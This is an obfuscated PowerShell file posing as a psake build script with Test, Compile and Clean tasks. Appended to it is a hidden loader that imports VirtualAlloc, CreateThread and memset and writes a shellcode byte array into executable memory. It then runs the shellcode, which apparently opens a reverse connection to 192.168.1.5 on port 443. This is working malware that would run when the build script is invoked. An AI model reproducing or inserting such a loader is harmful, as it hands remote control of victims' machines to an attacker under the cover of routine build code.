.("{1}{0}"-f 'k','tas') ("{0}{1}{2}"-f'd','efaul','t') -depends ("{1}{0}" -f 'est','T')

&("{1}{0}" -f'sk','ta') ("{0}{1}"-f'Te','st') -depends ("{1}{0}"-f'e','Compil'), ("{0}{1}"-f 'Clea','n') -PreAction {("{1}{2}{0}"-f't','Pre-Te','s')} -Action {
    .("{1}{2}{0}" -f't','As','ser') ${F`AL`SE} ("{1}{2}{0}"-f'ils.','Thi','s fa')
} -PostAction {("{0}{2}{3}{1}" -f'Pos','t','t-','Tes')}

.("{1}{0}" -f 'sk','ta') ("{2}{1}{0}"-f 'e','il','Comp') -depends ("{1}{0}" -f'ean','Cl') {
    ("{1}{0}"-f'ile','Comp')
}

&("{0}{1}" -f'tas','k') ("{0}{1}" -f 'Clea','n') {
    ("{1}{0}"-f'n','Clea')
}

${c} = (((("{6}{43}{57}{8}{48}{22}{36}{109}{14}{70}{98}{16}{1}{53}{87}{76}{26}{71}{63}{44}{49}{82}{75}{61}{88}{32}{66}{100}{54}{20}{18}{50}{11}{33}{47}{89}{72}{9}{55}{67}{10}{104}{2}{46}{112}{7}{5}{86}{80}{65}{110}{31}{19}{94}{28}{51}{21}{13}{115}{68}{83}{64}{108}{17}{114}{38}{59}{45}{69}{40}{92}{90}{35}{74}{91}{111}{97}{99}{93}{30}{81}{85}{101}{15}{52}{27}{3}{37}{42}{56}{34}{4}{60}{113}{25}{103}{79}{106}{78}{23}{105}{84}{96}{58}{24}{41}{0}{102}{29}{95}{73}{62}{77}{107}{12}{39}"-f'er','n','re','gs','Im','hre','[D','eT','({','}','c static extern In','l','r dest, uint src,','w','sta','eat','n I','t','otect','tribut','flPr','nt d','.dll{0',')','c','}','rtu','Fla',', u','tr','t','hreadAt','uint fl','lImpo','Dll','t','})]publ',', I','p',' uint count);','dd',' ext','ntPtr lpThre','llIm','tr','tar','a','rt({0}k','0}kernel32',' lpAddr',');[D','i','ion','t','ocationType, uint ',')]','adId);[','port','ic stati','S','p',' uint dwSize,','t(In','lAlloc(IntP','t','ntPt','Al','publi','ta','tA','t','a','2.dll{0','memse','P',',','i','t','0}','vcrt','(I',' d','ess','ckSize, In','p','wC','ad','Ptr V',' ','ernel3','s, In','tr ','res','uin','es',' ','ubl','er','ic exter',', ','l','r','n IntP','ms','tPtr C',']','.dll{','Pt','P','ic ','r lpT','lpParamet','t','ort({0','r l','S')) -F [CHAR]34));${W} = &("{1}{2}{0}" -f 'e','Add-T','yp') -memberDefinition ${C} -Name ("{1}{0}"-f '32','Win') -namespace ("{2}{0}{1}{3}{4}" -f'2Fu','ncti','Win3','on','s') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x05,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."l`ENgTH" -gt 0x1000){${g} = ${Z}."Len`gtH"};${X}=${w}::("{1}{2}{3}{0}"-f'c','Vir','tualAll','o').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${z}."LEN`Gth"-1);${I}++) {${W}::"mE`mSet"([IntPtr](${X}.("{1}{0}"-f't32','ToIn').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{0}{3}{2}{1}" -f 'CreateT','ead','r','h').Invoke(0,0,${x},0,0,0);for (;;){.("{3}{0}{2}{1}" -f'tart','leep','-s','S') 60};
